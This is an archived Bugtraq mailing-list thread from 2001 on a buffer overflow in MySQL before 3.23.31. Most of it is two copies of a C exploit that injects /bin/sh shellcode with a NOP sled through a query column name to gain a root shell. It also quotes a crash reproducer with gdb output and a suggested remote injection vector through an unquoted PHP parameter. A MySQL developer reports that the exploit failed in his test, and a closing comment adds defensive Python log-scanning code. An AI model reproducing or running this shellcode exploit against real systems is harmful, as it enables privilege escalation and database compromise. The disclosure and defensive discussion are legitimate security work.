5989804 2001-01-19 22:26 +0000 /221 lines/ Luis Miguel Ferreia Silva <lms@WWW.ISPGAYA.PT>
Attachment filename: "MySQLXploit.c"
Imported: 2001-01-23 01:12 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: lms@WWW.ISPGAYA.PT
Recipient: Bugtraq (import) <14925>
Attachment (text/plain) to text 5989803
Subject: Attachment (MySQLXploit.c) to: Re: MySQL Overflow + exploit [ops..sent a broken exploit :P]
------------------------------------------------------------
/*
Linux MySQL Exploit by Luis Miguel Silva [aka wC]
lms@ispgaya.pt
19/01/y2k+1

Compile:
gcc MySQLXploit.c -o MySQLX

Run with:
You can specify the offset for the exploit passing it as the 1st arg...
Example: ./MySQLX 0 ---> this is the default offset :]

Advisory:
[from a bugtraq email]

Hi,

all versions of MySQL < 3.23.31 have a buffer-overflow which crashes the
server and which seems to be exploitable (ie. 4141414 in eip)

Problem :
An attacker could gain mysqld privileges (gaining access to all the
databases)

Requirements :
You need a valid login/password to exploit this

Solution :
Upgrade to 3.23.31

Proof-of-concept code :
None

Credits :
I'm not the discoverer of this bug
The first public report was made by tharbad@kaotik.org via the MySQL
mailing-list
See the following mails for details

Regards,
Nicob

Here is the original post to the MySQL mailing-list :
==================================================

On Jan 12, João Gouveia wrote:
> Hi,
>
> I believe I've found a problem in MySql. Here are some tests I've made in
> 3.22.27 x86 (also tested on v3.22.32 - latest stable, although I didn't
> debug it, just tested to see if it crashes). Confirmed up to latest 3.23
>
> On one terminal:
> <quote>
> spike:/var/mysql # /sbin/init.d/mysql start
> Starting service MySQL.
> Starting mysqld daemon with databases from /var/mysql
> done
> spike:/var/mysql #
> </quote>
>
> On the other terminal:
> <quote>
> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
> Enter password:
> (hanged..^C)
> </quote>
>
> On the first terminal I got:
> <quote>
> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
> nohup $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-locking "$@" >>$err_log 2>&1
> Number of processes running now: 0
> mysqld restarted on Fri Jan 12 07:10:54 WET 2001
> mysqld daemon ended
> </quote>
>
> gdb shows the following:
> <quote>
> (gdb) run
> Starting program: /usr/sbin/mysqld
> [New Thread 16897 (manager thread)]
> [New Thread 16891 (initial thread)]
> [New Thread 16898]
> /usr/sbin/mysqld: ready for connections
> [New Thread 16916]
> [Switching to Thread 16916]
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) info all-registers
> eax            0x1        1
> ecx            0x68       104
> edx            0x8166947  135686471
> ebx            0x41414141 1094795585
> esp            0xbf5ff408 0xbf5ff408
> ebp            0x41414141 0x41414141
> esi            0x41414141 1094795585
> edi            0x0        0
> eip            0x41414141 0x41414141
> eflags         0x10246    66118
> cs             0x23       35
> ss             0x2b       43
> ds             0x2b       43
> es             0x2b       43
> fs             0x0        0
> gs             0x0        0
> (gdb)
> </quote>
>
> Looks like a typical overflow to me.
> Please reply asap, at least to tell me I'm not seeing things. :-)
>
> Best regards,
>
> Joao Gouveia aka Tharbad.
>
> tharbad@kaotik.org

Here is the response to an email I sent today to the MySQL list :
============================================================

Sergei Golubchik (MySQL team) wrote :
>
> Hi!
>
> On Jan 18, Nicolas GREGOIRE wrote:
> > Hi,
> >
> > Still not any info about the buffer-overflow discovered last week ?
> > Shouldn't it be fixed at the beginning of the week ?
> >
> > Please, dear MySQL team, give us info !!
> >
> > Regards,
> > Nicob
>
> Fixed in latest release (3.23.31).
>
> Regards,
> Sergei

Here is a part of the 3.23.30 to 3.23.31 diff :
=============================================

+Changes in release 3.23.31
+--------------------------
+
+  * Fixed security bug in something (please upgrade if you are using a
+    earlier MySQL 3.23 version).

End of Advisory

Final Words:
Yes..I'm still alive...<g> [just a'sleep..]
A big kiss to niness and hugs to all my friends...
lucipher && all of the unsecurity.org crew...
JFA and all of the AngelSP [pseudo :P]'crew...
Ahmm...I just wave everybody :]
*/

#include <stdio.h>
#include <stdlib.h>   /* malloc, atoi, exit, system */
#include <string.h>   /* strlen */

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 130
#define NOP 0x90

// Our EVIL code...
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

// Returns the current stack pointer (i386 only: the value is left in %eax)
unsigned long get_sp(void)
{
  __asm__("movl %esp,%eax");
}

// Where it all happens...
int main(int argc, char *argv[])
{
  char *buffer, *ptr, tmp[1500];
  long *addr_ptr, addr;
  int i, bsize = DEFAULT_BUFFER_SIZE, offset = DEFAULT_OFFSET;

  printf("\nMySQL [all versions < 3.23.31] Local Exploit by lms@ispgaya.pt\n\n");

  if (argc == 2)
    offset = atoi(argv[1]);
  else
    printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n");

  printf("Trying to allocate memory for buffer (%d bytes)...", bsize);
  // One extra long so the 4-byte address fill below cannot run past the end
  if (!(buffer = malloc(bsize + sizeof(long)))) {
    printf("ERROR!\n");
    printf("Couldn't allocate memory...\n");
    printf("Exiting...\n");
    exit(0);
  }
  printf("SUCCESS!\n");

  addr = get_sp() - offset;
  printf("Using address : 0x%lx\n", addr);
  printf("Offset : %d\n", offset);
  printf("Buffer Size : %d\n", bsize);

  // Fill the buffer with the guessed return address (4 bytes at a time, i386)
  ptr = buffer;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i += 4)
    *(addr_ptr++) = addr;

  // First half becomes NOPs, with the shellcode centred in the buffer
  for (i = 0; i < bsize / 2; i++)
    buffer[i] = NOP;
  ptr = buffer + ((bsize / 2) - (strlen(shellcode) / 2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];
  buffer[bsize - 1] = '\0';

  // Pass the buffer to the mysql client as a column name in a query
  snprintf(tmp, sizeof(tmp), "mysql -p -e 'select a.'%s'.b'", buffer);
  printf("Oh k...i have the evil'buffer right here :P\n");
  printf("So...[if all went well], prepare to be r00t...\n");
  system(tmp);
  return 0;
}
(5989804) --------------------------------(Rewrapped)

5989877 2001-01-19 22:07 +0000 /23 lines/ Luis Miguel Ferreia Silva <lms@WWW.ISPGAYA.PT>
Sent by: joel@lysator.liu.se
Imported: 2001-01-23 02:21 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: lms@WWW.ISPGAYA.PT
Recipient: Bugtraq (import) <14932>
Subject: Re: MySQL < 3.23.31 Overflow [exploit]
------------------------------------------------------------
Hello...

Here's an exploit for this...
[See attached...]
Regardz,

Luis Miguel Silva aka wC
Member of lonoss.org and unsecurity.org
http://www.lonoss.org/
http://www.unsecurity.org/
http://www.ispgaya.pt/ Student
Personal WebPage at:
http://paginas.ispgaya.pt/~lms/
&&
http://www.unsecurity.org/wC/
Personal Code at:
www.unsecurity.org/wC/MyCode/
(5989877) ------------------------------------------
Attachment (text/plain) in text 5989878

5989878 2001-01-19 22:07 +0000 /217 lines/ Luis Miguel Ferreia Silva <lms@WWW.ISPGAYA.PT>
Attachment filename: "MySQLXploit.c"
Imported: 2001-01-23 02:21 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: lms@WWW.ISPGAYA.PT
Recipient: Bugtraq (import) <14933>
Attachment (text/plain) to text 5989877
Subject: Attachment (MySQLXploit.c) to: Re: MySQL < 3.23.31 Overflow [exploit]
------------------------------------------------------------
/*
Linux MySQL Exploit by Luis Miguel Silva [aka wC]
lms@ispgaya.pt
19/01/y2k+1

Compile:
gcc MySQLXploit.c -o MySQLX

Run with:
You can specify the offset for the exploit passing it as the 1st arg...
Example: ./MySQLX 0 ---> this is the default offset :]

Advisory:
[from a bugtraq email]

Hi,

all versions of MySQL < 3.23.31 have a buffer-overflow which crashes the
server and which seems to be exploitable (ie. 4141414 in eip)

Problem :
An attacker could gain mysqld privileges (gaining access to all the
databases)

Requirements :
You need a valid login/password to exploit this

Solution :
Upgrade to 3.23.31

Proof-of-concept code :
None

Credits :
I'm not the discoverer of this bug
The first public report was made by tharbad@kaotik.org via the MySQL
mailing-list
See the following mails for details

Regards,
Nicob

Here is the original post to the MySQL mailing-list :
==================================================

On Jan 12, João Gouveia wrote:
> Hi,
>
> I believe I've found a problem in MySql. Here are some tests I've made in
> 3.22.27 x86 (also tested on v3.22.32 - latest stable, although I didn't
> debug it, just tested to see if it crashes). Confirmed up to latest 3.23
>
> On one terminal:
> <quote>
> spike:/var/mysql # /sbin/init.d/mysql start
> Starting service MySQL.
> Starting mysqld daemon with databases from /var/mysql
> done
> spike:/var/mysql #
> </quote>
>
> On the other terminal:
> <quote>
> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
> Enter password:
> (hanged..^C)
> </quote>
>
> On the first terminal I got:
> <quote>
> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
> nohup $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-locking "$@" >>$err_log 2>&1
> Number of processes running now: 0
> mysqld restarted on Fri Jan 12 07:10:54 WET 2001
> mysqld daemon ended
> </quote>
>
> gdb shows the following:
> <quote>
> (gdb) run
> Starting program: /usr/sbin/mysqld
> [New Thread 16897 (manager thread)]
> [New Thread 16891 (initial thread)]
> [New Thread 16898]
> /usr/sbin/mysqld: ready for connections
> [New Thread 16916]
> [Switching to Thread 16916]
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) info all-registers
> eax            0x1        1
> ecx            0x68       104
> edx            0x8166947  135686471
> ebx            0x41414141 1094795585
> esp            0xbf5ff408 0xbf5ff408
> ebp            0x41414141 0x41414141
> esi            0x41414141 1094795585
> edi            0x0        0
> eip            0x41414141 0x41414141
> eflags         0x10246    66118
> cs             0x23       35
> ss             0x2b       43
> ds             0x2b       43
> es             0x2b       43
> fs             0x0        0
> gs             0x0        0
> (gdb)
> </quote>
>
> Looks like a typical overflow to me.
> Please reply asap, at least to tell me I'm not seeing things. :-)
>
> Best regards,
>
> Joao Gouveia aka Tharbad.
>
> tharbad@kaotik.org

Here is the response to an email I sent today to the MySQL list :
============================================================

Sergei Golubchik (MySQL team) wrote :
>
> Hi!
>
> On Jan 18, Nicolas GREGOIRE wrote:
> > Hi,
> >
> > Still not any info about the buffer-overflow discovered last week ?
> > Shouldn't it be fixed at the beginning of the week ?
> >
> > Please, dear MySQL team, give us info !!
> >
> > Regards,
> > Nicob
>
> Fixed in latest release (3.23.31).
>
> Regards,
> Sergei

Here is a part of the 3.23.30 to 3.23.31 diff :
=============================================

+Changes in release 3.23.31
+--------------------------
+
+  * Fixed security bug in something (please upgrade if you are using a
+    earlier MySQL 3.23 version).

End of Advisory

Final Words:
Yes..I'm still alive...<g> [just a'sleep..]
A big kiss to niness and hugs to all my friends...
lucipher && all of the unsecurity.org crew...
JFA and all of the AngelSP [pseudo :P]'crew...
Ahmm...I just wave everybody :]
*/

#include <stdio.h>
#include <stdlib.h>   /* malloc, atoi, exit, system */
#include <string.h>   /* strlen */

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 130
#define RET_ADDR 0x41414141
#define NOP 0x90

// Our EVIL code...
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

// Where it all happens...
int main(int argc, char *argv[])
{
  char *buffer, *ptr, tmp[1500];
  long *addr_ptr, addr;
  int i, bsize = DEFAULT_BUFFER_SIZE, offset = DEFAULT_OFFSET;

  printf("\nMySQL [all versions < 3.23.31] Local Exploit by lms@ispgaya.pt\n\n");

  if (argc == 2)
    offset = atoi(argv[1]);
  else
    printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n");

  printf("Trying to allocate memory for buffer (%d bytes)...", bsize);
  // One extra long so the 4-byte address fill below cannot run past the end
  if (!(buffer = malloc(bsize + sizeof(long)))) {
    printf("ERROR!\n");
    printf("Couldn't allocate memory...\n");
    printf("Exiting...\n");
    exit(0);
  }
  printf("SUCCESS!\n");

  // RET_ADDR is the fixed 0x41414141 placeholder; this is the version Monty tested below
  addr = RET_ADDR - offset;
  printf("Using address : 0x%lx\n", addr);
  printf("Offset : %d\n", offset);
  printf("Buffer Size : %d\n", bsize);

  // Fill the buffer with the return address (4 bytes at a time, i386)
  ptr = buffer;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i += 4)
    *(addr_ptr++) = addr;

  // First half becomes NOPs, with the shellcode centred in the buffer
  for (i = 0; i < bsize / 2; i++)
    buffer[i] = NOP;
  ptr = buffer + ((bsize / 2) - (strlen(shellcode) / 2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];
  buffer[bsize - 1] = '\0';

  // Pass the buffer to the mysql client as a column name in a query
  snprintf(tmp, sizeof(tmp), "mysql -p -e 'select a.'%s'.b'", buffer);
  printf("Oh k...i have the evil'buffer right here :P\n");
  printf("So...[if all went well], prepare to be r00t...\n");
  system(tmp);
  return 0;
}
(5989878) --------------------------------(Rewrapped)

5993353 2001-01-23 17:47 +0200 /111 lines/ Michael Widenius <monty@MYSQL.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-01-23 21:05 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: monty@mysql.com
Recipient: Bugtraq (import) <14949>
Subject: Re: MySQL < 3.23.31 Overflow [exploit] (fwd)
------------------------------------------------------------
From: Michael Widenius <monty@MYSQL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <14957.42910.912031.978457@narttu.mysql.com>

Hi!

I got forwarded this 'exploit' of MySQL:

Lus> Hello...
Lus> Here's an exploit for this...
Lus> [See attached...]
Lus> Regardz,
Lus> Luis Miguel Silva aka wC
Lus> Member of lonoss.org and unsecurity.org
Lus> http://www.lonoss.org/
Lus> http://www.unsecurity.org/
Lus> http://www.ispgaya.pt/ Student
Lus> Personal WebPage at:
Lus> http://paginas.ispgaya.pt/~lms/
Lus> &&
Lus> http://www.unsecurity.org/wC/
Lus> Personal Code at:
Lus> www.unsecurity.org/wC/MyCode/
Lus> /*
Lus> Linux MySQL Exploit by Luis Miguel Silva [aka wC]
Lus> lms@ispgaya.pt
Lus> 19/01/y2k+1
Lus> Compile:
Lus> gcc MySQLXploit.c -o MySQLX
Lus> Run with:
Lus> You can specify the offset for the exploit passing it as the 1st arg...
Lus> Example: ./MySQLX 0 ---> this is the default offset :]
Lus> Advisory:
Lus> [from a bugtraq email]
Lus> Hi,
Lus> all versions of MySQL < 3.23.31 have a buffer-overflow which crashes the
Lus> server and which seems to be exploitable (ie. 4141414 in eip)
Lus> Problem :
Lus> An attacker could gain mysqld privileges (gaining access to all the
Lus> databases)
Lus> Requirements :
Lus> You need a valid login/password to exploit this
Lus> Solution :
Lus> Upgrade to 3.23.31
Lus> Proof-of-concept code :
Lus> None
Lus> Credits :
Lus> I'm not the discoverer of this bug
Lus> The first public report was made by tharbad@kaotik.org via the MySQL
Lus> mailing-list
Lus> See the following mails for details
Lus> Regards,
Lus> Nicob

<cut>

I have looked at the 'exploit' and tested this against a 3.23.30 server,
but it didn't work. The server nicely gave the error:

-----------------
(/my/tmp) exploit 0

MySQL [all versions < 3.23.31] Local Exploit by lms@ispgaya.pt

Trying to allocate memory for buffer (130 bytes)...SUCCESS!
Using address : 0x41414141
Offset : 0
Buffer Size : 130
Oh k...i have the evil'buffer right here :P
So...[if all went well], prepare to be r00t...
Enter password:
ERROR 1064 at line 1: You have an error in your SQL syntax near '^1ÀFF ° óV Í1ÛØ@ÍèÜÿÿÿ/bin/shAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' at line 1
-------------

I can't see how this particular exploit could work, as MySQL strips all
non-ASCII characters from the column name and stops at the first
non-ASCII character. In other words, an exploit like this could
theoretically work if the assembler code only used bytes in this region,
but this particular program didn't do that...

Anyway, this is just a typical example of why one should be careful not
to run mysqld as root, but as its own user.

Regards,
Monty
(5993353) --------------------------------(Rewrapped)

5993976 2001-01-23 04:29 +0000 /57 lines/ Joao Gouveia <tharbad@KAOTIK.ORG>
Sent by: joel@lysator.liu.se
Imported: 2001-01-23 23:12 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: tharbad@kaotik.org
Recipient: Bugtraq (import) <14963>
Comment on text 5979526 by Nicolas GREGOIRE <nicolas.gregoire@7THZONE.COM>
Subject: Re: Buffer overflow in MySQL < 3.23.31
------------------------------------------------------------
From: Joao Gouveia <tharbad@KAOTIK.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <004301c084f5$0d7e2a40$0400a8c0@corbusier.org>

Hi,

----- Original Message -----
From: "Nicolas GREGOIRE" <nicolas.gregoire@7THZONE.COM>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Thursday, January 18, 2001 5:44 PM
Subject: Buffer overflow in MySQL < 3.23.31

> Hi,
>
> all versions of MySQL < 3.23.31 have a buffer-overflow which crashes the
> server and which seems to be exploitable (ie. 4141414 in eip)
>
> Problem :
> An attacker could gain mysqld privileges (gaining access to all the
> databases)
>
> Requirements :
> You need a valid login/password to exploit this

Not always, in a default installation one can exploit like this:
mysql -ustring -e<query>
No need for a valid database, login, nor password.

Also, afaik, this can't easily be exploited just by using a
"select a.(buffer).a" because buffer must be part of a valid SQL query.
I didn't test it, but I suppose it's true.

The real danger of this flaw, I think, is the possibility of being
exploited remotely. If there is a simple php script (for example) that
has a sql query like "$SQL=select * from table where index=$index"
(providing that $index isn't quoted), one can exploit using something
like:
script.php?index=a.(buffer).b

>
> Solution :
> Upgrade to 3.23.31
>
> Proof-of-concept code :
> None
>
> Credits :
> I'm not the discoverer of this bug
> The first public report was made by tharbad@kaotik.org via the MySQL
> mailing-list
> See the following mails for details

Best regards,

Joao Gouveia
--------------
tharbad@kaotik.org
(5993976) --------------------------------(Rewrapped)

Comment in text 5994069 by Hedda (Kind, pleasant and good-looking)
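A defender-side check for the two points made in the thread above, Monty's observation that the crash rides on an overlong column name that the server cuts at the first non-ASCII byte, and Joao's remote vector through an unquoted web parameter. This is an added example, not code from any of the posts: an allowlist for names a web application interpolates into SQL, plus a scan over query-log lines that flags the a.AAAA...b shape. The 64-character identifier limit and the log-line format are assumptions.

```python
import re

# MySQL identifier length limit, assumed here to be 64 characters.
MAX_IDENT_LEN = 64

# Allowlist for a name a web application is about to splice into SQL (the
# unquoted $index case from the thread): letters, digits, underscore only.
SAFE_IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,%d}$" % (MAX_IDENT_LEN - 1))
# Single-quoted SQL string literals, escaped quotes included.
STRING_LITERAL_RE = re.compile(r"'(?:[^'\\]|\\.)*'")
# Anything that is not whitespace or SQL punctuation; dotted names stay whole.
TOKEN_RE = re.compile(r"[^\s(),;=*<>]+")


def is_safe_identifier(name: str) -> bool:
    """True only if `name` may be interpolated as a column or table name."""
    return bool(SAFE_IDENT_RE.match(name))


def scan_query(query: str):
    """Return (reason, token) findings for one SQL statement.

    String literals are blanked so quoted data is not mistaken for a name.
    Each dotted name (a.X.b) is checked part by part: a part with bytes
    outside printable ASCII, or longer than MAX_IDENT_LEN, is reported.
    """
    findings = []
    for token in TOKEN_RE.findall(STRING_LITERAL_RE.sub("''", query)):
        for part in token.split("."):
            if not part:
                continue
            if any(not 0x20 <= ord(c) <= 0x7E for c in part):
                findings.append(("non-ascii-or-control", part))
            elif len(part) > MAX_IDENT_LEN:
                findings.append(("overlong-identifier", part))
    return findings


def scan_log(lines):
    """Map 1-based line number -> findings, for every line that has any."""
    hits = {}
    for number, line in enumerate(lines, 1):
        found = scan_query(line)
        if found:
            hits[number] = found
    return hits


# Constructed general-query-log style lines: a benign statement, the
# 130 x 'A' column name from the thread, and the same shape carrying
# NOP (0x90) bytes that arrived through an unquoted web parameter.
SAMPLE_LOG = [
    "Query   select id, name from users where id = 42",
    "Query   select a." + "A" * 130 + ".b",
    "Query   select * from table where index=a." + "\x90" * 4 + ".b",
]
```

scan_log(SAMPLE_LOG) reports lines 2 and 3 only; the first line passes because every name in it is short, printable ASCII.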